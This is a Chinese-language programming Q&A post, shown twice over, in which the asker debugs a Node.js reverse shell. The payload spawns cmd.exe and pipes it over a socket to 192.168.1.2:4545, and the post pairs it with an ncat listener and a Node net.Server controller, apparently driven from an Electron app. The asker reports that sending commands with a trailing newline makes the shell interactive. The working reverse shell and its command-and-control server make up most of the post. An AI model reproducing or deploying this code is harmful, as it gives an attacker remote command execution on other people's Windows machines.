Nodejs 反转 shell 与 net.socket
Nodejs reverse shell with net.socket
大家早上好,我在 NodeJS 中遇到反向 shell 的问题,当我创建套接字并使用 netcat 收听时,它完美地工作但是当我使用 net.Server 创建新服务器时,我收到 shell 但它不是交互式的,shell 代码是这样的:
(function(){
var net = require("net"),
child = require("child_process"),
shell = child.spawn("cmd.exe", []);
var client = new net.Socket();
client.connect(4545, "192.168.1.2", function(){
client.pipe(shell.stdin);
shell.stdout.pipe(client);
shell.stderr.pipe(client);
});
return /a/;
})();
当我用 netcat 收听时,我可以得到相反的结果 shell
ncat -nvlp 4545
但是当我想在 nodejs 中创建一个 TCP 服务器时出现了问题,我收到了 cmd.exe 的横幅,但没有交互性
这是服务器部分的代码:
const net = require("net");
let server = new net.Server();
server.listen({ host: '192.168.1.2', port: 4545 }, () => {
console.log(`Server listen in 4545`);
});
server.on("close", () => {
console.log('connection closed')
});
server.on("error", (e) => {
if (e.code === "EADDRINUSE") {
console.log("Address in use, retrying...");
setTimeout(() => {
this.server.close();
this.server.listen(4545, '192.168.1.2');
}, 2000);
}
});
server.on("connection", (socket) => {
console.log("new connection");
// HERE I SEND COMMAND WITH ELECTRON JS
socket.write('command');
console.log((socket.pipe(socket));
// Socket is quitted
socket.on("close", () => {
console.log('socket closed')
});
socket.on("end", () => {
console.log(`Client ${socket} disconnected`);
socket.destroy();
});
});
当我发送命令示例'dir'时,我收到一个对象,该对象带有位于服务器上方的管道
所以问题是当我发送命令时如何接收命令的结果,例如接收 socket
的文件和目录列表
Socket {
connecting: false,
_hadError: false,
_parent: null,
_host: null,
_readableState: ReadableState {
objectMode: false,
highWaterMark: 16384,
buffer: BufferList { head: null, tail: null, length: 0 },
length: 0,
pipes: [Circular],
pipesCount: 1,
flowing: true,
ended: false,
endEmitted: false,
reading: true,
sync: false,
needReadable: true,
emittedReadable: false,
readableListening: false,
resumeScheduled: false,
paused: false,
emitClose: false,
autoDestroy: false,
destroyed: false,
defaultEncoding: 'utf8',
awaitDrain: 0,
readingMore: false,
decoder: null,
encoding: null
},
readable: true,
_events: [Object: null prototype] {
end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
close: [ [Function], [Function] ],
data: [ [Function], [Function: ondata] ],
unpipe: [Function: onunpipe],
error: [Function: onerror],
finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
},
_eventsCount: 6,
_maxListeners: undefined,
_writableState: WritableState {
objectMode: false,
highWaterMark: 16384,
finalCalled: false,
needDrain: false,
ending: false,
ended: false,
finished: false,
destroyed: false,
decodeStrings: false,
defaultEncoding: 'utf8',
length: 0,
writing: false,
corked: 0,
sync: false,
bufferProcessing: false,
onwrite: [Function: bound onwrite],
writecb: null,
writelen: 0,
afterWriteTickInfo: {
count: 1,
cb: [Function: nop],
stream: [Circular],
state: [Circular]
},
bufferedRequest: null,
lastBufferedRequest: null,
pendingcb: 1,
prefinished: false,
errorEmitted: false,
emitClose: false,
autoDestroy: false,
bufferedRequestCount: 0,
corkedRequestsFree: {
next: null,
entry: null,
finish: [Function: bound onCorkedFinish]
}
},
writable: true,
allowHalfOpen: false,
_sockname: { address: '192.168.1.2', family: 'IPv4', port: 4545},
_pendingData: null,
_pendingEncoding: '',
server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4443',
[Symbol(asyncId)]: 16
},
_server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4545',
[Symbol(asyncId)]: 16
},
id: 790,
_peername: { address: '192.168.1.2', family: 'IPv4', port: 59793 },
[Symbol(asyncId)]: 18,
[Symbol(kHandle)]: TCP {
reading: true,
onconnection: null,
[Symbol(owner)]: [Circular]
},
[Symbol(lastWriteQueueSize)]: 0,
[Symbol(timeout)]: null,
[Symbol(kBuffer)]: null,
[Symbol(kBufferCb)]: null,
[Symbol(kBufferGen)]: null,
[Symbol(kBytesRead)]: 0,
[Symbol(kBytesWritten)]: 0
}
经过几次尝试,我设法在写入中添加 \n 以输入代码变为
所以代码变成
socket.write('command'+ '\n');
大家早上好,我在 NodeJS 中遇到反向 shell 的问题,当我创建套接字并使用 netcat 收听时,它完美地工作但是当我使用 net.Server 创建新服务器时,我收到 shell 但它不是交互式的,shell 代码是这样的:
(function(){
var net = require("net"),
child = require("child_process"),
shell = child.spawn("cmd.exe", []);
var client = new net.Socket();
client.connect(4545, "192.168.1.2", function(){
client.pipe(shell.stdin);
shell.stdout.pipe(client);
shell.stderr.pipe(client);
});
return /a/;
})();
当我用 netcat 收听时,我可以得到相反的结果 shell
ncat -nvlp 4545
但是当我想在 nodejs 中创建一个 TCP 服务器时出现了问题,我收到了 cmd.exe 的横幅,但没有交互性
这是服务器部分的代码:
const net = require("net");
let server = new net.Server();
server.listen({ host: '192.168.1.2', port: 4545 }, () => {
console.log(`Server listen in 4545`);
});
server.on("close", () => {
console.log('connection closed')
});
server.on("error", (e) => {
if (e.code === "EADDRINUSE") {
console.log("Address in use, retrying...");
setTimeout(() => {
this.server.close();
this.server.listen(4545, '192.168.1.2');
}, 2000);
}
});
server.on("connection", (socket) => {
console.log("new connection");
// HERE I SEND COMMAND WITH ELECTRON JS
socket.write('command');
console.log((socket.pipe(socket));
// Socket is quitted
socket.on("close", () => {
console.log('socket closed')
});
socket.on("end", () => {
console.log(`Client ${socket} disconnected`);
socket.destroy();
});
});
当我发送命令示例'dir'时,我收到一个对象,该对象带有位于服务器上方的管道 所以问题是当我发送命令时如何接收命令的结果,例如接收 socket
的文件和目录列表 Socket {
connecting: false,
_hadError: false,
_parent: null,
_host: null,
_readableState: ReadableState {
objectMode: false,
highWaterMark: 16384,
buffer: BufferList { head: null, tail: null, length: 0 },
length: 0,
pipes: [Circular],
pipesCount: 1,
flowing: true,
ended: false,
endEmitted: false,
reading: true,
sync: false,
needReadable: true,
emittedReadable: false,
readableListening: false,
resumeScheduled: false,
paused: false,
emitClose: false,
autoDestroy: false,
destroyed: false,
defaultEncoding: 'utf8',
awaitDrain: 0,
readingMore: false,
decoder: null,
encoding: null
},
readable: true,
_events: [Object: null prototype] {
end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
close: [ [Function], [Function] ],
data: [ [Function], [Function: ondata] ],
unpipe: [Function: onunpipe],
error: [Function: onerror],
finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
},
_eventsCount: 6,
_maxListeners: undefined,
_writableState: WritableState {
objectMode: false,
highWaterMark: 16384,
finalCalled: false,
needDrain: false,
ending: false,
ended: false,
finished: false,
destroyed: false,
decodeStrings: false,
defaultEncoding: 'utf8',
length: 0,
writing: false,
corked: 0,
sync: false,
bufferProcessing: false,
onwrite: [Function: bound onwrite],
writecb: null,
writelen: 0,
afterWriteTickInfo: {
count: 1,
cb: [Function: nop],
stream: [Circular],
state: [Circular]
},
bufferedRequest: null,
lastBufferedRequest: null,
pendingcb: 1,
prefinished: false,
errorEmitted: false,
emitClose: false,
autoDestroy: false,
bufferedRequestCount: 0,
corkedRequestsFree: {
next: null,
entry: null,
finish: [Function: bound onCorkedFinish]
}
},
writable: true,
allowHalfOpen: false,
_sockname: { address: '192.168.1.2', family: 'IPv4', port: 4545},
_pendingData: null,
_pendingEncoding: '',
server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4443',
[Symbol(asyncId)]: 16
},
_server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4545',
[Symbol(asyncId)]: 16
},
id: 790,
_peername: { address: '192.168.1.2', family: 'IPv4', port: 59793 },
[Symbol(asyncId)]: 18,
[Symbol(kHandle)]: TCP {
reading: true,
onconnection: null,
[Symbol(owner)]: [Circular]
},
[Symbol(lastWriteQueueSize)]: 0,
[Symbol(timeout)]: null,
[Symbol(kBuffer)]: null,
[Symbol(kBufferCb)]: null,
[Symbol(kBufferGen)]: null,
[Symbol(kBytesRead)]: 0,
[Symbol(kBytesWritten)]: 0
}
经过几次尝试,我设法在写入中添加 \n 以输入代码变为 所以代码变成
socket.write('command'+ '\n');